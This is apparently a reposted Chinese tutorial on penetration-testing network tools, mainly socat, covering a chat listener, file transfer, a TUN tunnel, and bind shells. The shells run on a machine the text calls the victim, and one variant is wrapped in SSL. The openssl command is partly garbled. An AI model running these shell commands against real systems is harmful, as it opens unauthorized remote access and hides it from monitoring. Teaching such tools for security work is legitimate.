本文,为大家简单介绍我们常见的网络工具的一些使用方法。
Socat
Socat
是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。
😘安装
apt-get install socat
🤖监听 聊天工具
首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)
socat -dd tcp-listen:7777 stdout
接下来,我们客户端连接。
socat - tcp4:192.168.50.77:7777
🐸正 反向弹shell
目标机(受害端)执行命令
socat tcp4-listen:8000 exec:/usr/bin/bash
攻击端执行命令
socat - tcp4:192.168.50.77:8000
效果如下:
😎文件传输
文件传输是最常用的,让我们一起看看如何实现。发送端执行命令
socat tcp4-listen:8000 file:kali.txt
接收端执行命令
socat tcp4:192.168.50.77:8000 file:kali.txt,creat
🐻❄️搭建异地组网
需要注意的是,服务端需为公网vps。
socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up
客户端
socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口
📧SSL 连接
前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl
这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem
格式保存
openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt
接下来,服务端执行命令
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
客户端执行命令
socat - OPENSSL:监听端的 IP:443,verify=0
当然,还有更多的玩法。大家可以参考命令帮助。
CryptCat
CryptCat
具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。
Netcat
之前也写过详细的使用文章,详细教程请移步历史文章。
原文始发于微信公众号(kali笔记):渗透测试中的哪些网络军刀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论